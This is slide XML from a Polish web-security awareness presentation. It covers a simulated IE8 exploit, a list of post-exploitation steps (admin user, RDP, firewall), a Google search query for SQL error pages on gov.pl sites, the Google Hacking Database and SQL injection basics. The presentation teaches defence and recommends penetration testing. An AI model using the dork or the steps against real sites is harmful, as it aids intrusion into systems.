            <a:ext cx="5472608" cy="720080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79512" y="3068960"/>
            <a:ext cx="6048672" cy="1152128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79512" y="4293096"/>
            <a:ext cx="4536504" cy="936104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401400" y="1110223"/>
            <a:ext cx="25630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err="1" smtClean="0"/>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" smtClean="0"/>
              <a:t> na IE8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Atakujący zyskuje pełen dostęp do wiersza poleceń systemu Windows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…i może </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0"/>
              <a:t>zrobić </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0"/>
              <a:t>samo co w trybie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" dirty="0" smtClean="0"/>
              <a:t>graficznym</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="pole tekstowe 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1601931">
            <a:off x="7116653" y="264265"/>
            <a:ext cx="2007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i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>symulacja!</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="3200" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Łącznik prosty ze strzałką 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1547664" y="5085184"/>
            <a:ext cx="504056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6588224" y="4653136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…w przypadku jeśli użytkownik nie działa z prawami administratora</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000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79512" y="5301208"/>
            <a:ext cx="4536504" cy="936104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54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34" y="260648"/>
            <a:ext cx="5277270" cy="5959366"/>
          </a:xfrm>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9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pl-PL" dirty="0" smtClean="0"/>
              <a:t>© Adam Ziaja &lt;adam@adamziaja.com&gt;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79512" y="2276872"/>
            <a:ext cx="2520280" cy="360040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79512" y="3284984"/>
            <a:ext cx="5184576" cy="2808312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652120" y="235669"/>
            <a:ext cx="331236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Uzyskanie uprawnień administratora przez zastosowanie lokalnego </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>exploita</a:t>
            </a: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Dodanie własnego użytkownika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Dodanie uprawnień administratora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Dodanie możliwości łączenia na zdalny pulpit (RDP)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Uruchomienie usługi RDP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(nie występuje na zrzucie ekranu)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Odblokowanie RDP na firewallu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Połączenie na RDP…</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="pole tekstowe 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20406581">
            <a:off x="939203" y="5976624"/>
            <a:ext cx="2007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i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>symulacja!</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="3200" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF000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 rot="2098129">
            <a:off x="839696" y="2105561"/>
            <a:ext cx="746460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HACKED</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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121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Dzięki podatnej stronie atakujący może np.:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Uzyskać pełen dostęp do serwera</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Uzyskać pełen dostęp do stacji roboczej użytkownika</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Dalej na wiele sposobów eskalować zdobyte uprawienia np. przez sieć lokalną do której podpięty jest serwer lub użytkownik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&lt;adam@adamziaja.com&gt;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70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2980" y="3331841"/>
            <a:ext cx="7818040" cy="17784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/>
              <a:t>Prawdziwi hakerzy (w większości przypadków) nie podmieniają stron internetowych ale utrzymują </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3600" dirty="0" smtClean="0"/>
              <a:t>dostęp…</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="36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&lt;adam@adamziaja.com&gt;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764704"/>
            <a:ext cx="22860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4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Zaprezentowana została tylko bardzo niewielka część </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>z najpopularniejszych ataków</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>„Bezpieczeństwo aplikacji webowych”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(publikacja TAPT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2014) – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>opis ataków oraz metody ich wykrywania z punktu widzenia informatyki śledczej</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050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&lt;adam@adamziaja.com&gt;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90834"/>
            <a:ext cx="2753016" cy="50793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349" y="2722706"/>
            <a:ext cx="828572" cy="634286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681776" y="2837105"/>
            <a:ext cx="4210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i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>metodyki testów penetracyjnych</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2400" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Łącznik prosty ze strzałką 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4355976" y="3082746"/>
            <a:ext cx="345855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94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30" y="2420888"/>
            <a:ext cx="2571750" cy="304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9776"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Jeden z najsłabszych punktów bezpieczeństwa IT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525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0"/>
              <a:t>Statystycznie najprostszą metodą włamania </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>jest wykorzystanie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0"/>
              <a:t>podatnej strony </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>internetowej</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(nie licząc „podatnych” ludzi – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>itd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="24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pl-PL" dirty="0" smtClean="0"/>
              <a:t>© Adam Ziaja &lt;adam@adamziaja.com&gt;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40014"/>
            <a:ext cx="4335348" cy="325151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 rot="20522258">
            <a:off x="5096185" y="5248526"/>
            <a:ext cx="2056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i="1" dirty="0" smtClean="0"/>
              <a:t>ACTA w 2012 roku</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2000" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="pole tekstowe 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20522258">
            <a:off x="5945044" y="5564782"/>
            <a:ext cx="32708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i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>przeciętny wiek zatrzymanych</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>członków grupy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2000" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ok. 15-19 lat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(źródło </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wikipedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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94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żyć?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2432" y="2874641"/>
            <a:ext cx="7139136" cy="11087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/>
              <a:t>Zatrudnić </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>pentesterów</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> lub zlecać testy penetracyjne zewnętrznym </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>podmiotom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&lt;adam@adamziaja.com&gt;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811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Czy trzeba w ogóle się znać,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>aby się włamać?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37888"/>
            <a:ext cx="4504762" cy="3310476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582380"/>
            <a:ext cx="2857500" cy="38100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71130" y="5425479"/>
            <a:ext cx="82601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i="1" dirty="0" smtClean="0"/>
              <a:t>hasła </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" i="1" dirty="0"/>
              <a:t>są jak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>majtki:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zmieniaj </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>je często, nie zostawiaj na widoku i nie pożyczaj </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>obcym</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2400" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0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11560" y="1340768"/>
            <a:ext cx="1684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i="1" dirty="0" smtClean="0"/>
              <a:t>to zależy…</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2800" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9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pl-PL" dirty="0" smtClean="0"/>
              <a:t>© Adam Ziaja &lt;adam@adamziaja.com&gt;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564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238328"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Adam Ziaja &lt;adam@adamziaja.com&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3200" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" sz="3200" u="sng" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3200" u="sng" dirty="0" smtClean="0"/>
              <a:t>adamziaja.com</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="3200" u="sng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778868"/>
            <a:ext cx="4762500" cy="3162300"/>
          </a:xfr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 smtClean="0"/>
              <a:t>Dziękuję </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="4000" dirty="0"/>
              <a:t>za uwagę!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="356263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Ataki na strony rządowe</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" smtClean="0"/>
              <a:t>dokonywane m.in. przez </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Anonymous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t> Poland</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="4800" b="1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&lt;adam@adamziaja.com&gt;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Czy można włamać się na „</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0"/>
              <a:t>długiej przerwie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>” (20 min)?</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Symbol zastępczy zawartości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388" y="2204864"/>
            <a:ext cx="3771900" cy="4029075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 rot="20165523">
            <a:off x="6445421" y="2653900"/>
            <a:ext cx="26622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ponad 5 tysięcy wyników…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(duża część to duplikaty</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>na tej samej stronie)</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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395670" y="2708920"/>
            <a:ext cx="2384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Google </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>hacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0"/>
              <a:t>"SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" err="1"/>
              <a:t>syntax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>site:gov.pl</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" i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04" y="3584664"/>
            <a:ext cx="3403600" cy="258064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 rot="20921114">
            <a:off x="6778797" y="5131825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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>syntax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- część komunikatu z bazy danych o błędzie w zapytaniu SQL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94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Google </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Hacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> Database (GHDB)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800" u="sng" dirty="0"/>
              <a:t>https://www.exploit-db.com/google-hacking-database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" u="sng" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2400" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Gotowa baza zapytań do wyszukiwarki Google, dzięki której znaleźć można m.in. takie informacje jak:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0"/>
              <a:t>Podatne strony internetowe (np. przez komunikaty z błędami oraz stopki zawierające informacje o działającym oprogramowaniu, często wraz z wersją)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>„Głęboko ukryte” pliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> (czyli w trudnej do odgadnięcia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>lokalizacji) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Hasła, numery kart kredytowych</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Urządzenia sieciowe (np. podatne routery)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0"/>
              <a:t>…wszystko co znalazła wyszukiwarka Google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pl-PL" dirty="0" smtClean="0"/>
              <a:t>© Adam Ziaja &lt;adam@adamziaja.com&gt;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712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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>)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12776"/>
            <a:ext cx="6667500" cy="4438650"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5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pl-PL" dirty="0" smtClean="0"/>
              <a:t>© Adam Ziaja &lt;adam@adamziaja.com&gt;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436096" y="1268760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…błąd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> występuję wtedy kiedy użytkownik może zmodyfikować zapytanie do serwera w taki sposób, że aplikacja prześle je dalej, a baza danych wykona zmodyfikowane zapytanie</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Łącznik prosty ze strzałką 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4644008" y="2564904"/>
            <a:ext cx="792088" cy="13681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3203848" y="5733256"/>
            <a:ext cx="5785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…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" i="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>może</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> również zawierać komunikat o błędzie z bazy danych</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(oczywiście tylko w przypadku jego wystąpienia)</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Łącznik prosty ze strzałką 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4788024" y="5589240"/>
            <a:ext cx="216024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5447822" y="2924944"/>
            <a:ext cx="36606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…atak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0"/>
              <a:t>jest atakiem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0"/>
              <a:t>typu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>server-side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0"/>
              <a:t> (po stronie serwera),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0"/>
              <a:t>atakowany jest bezpośrednio serwer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137927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&lt;adam@adamziaja.com&gt;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3896"/>
            <a:ext cx="8229600" cy="3119120"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="pole tekstowe 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1908547" y="28109"/>
            <a:ext cx="5165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>
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/* zrzuty ekranu z marca 2013, błąd już nie istnieje */</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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824190"/>
            <a:ext cx="8712200" cy="548513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7812360" y="5085184"/>
            <a:ext cx="1080120" cy="144016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3419872" y="1628800"/>
            <a:ext cx="2160240" cy="41044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83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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
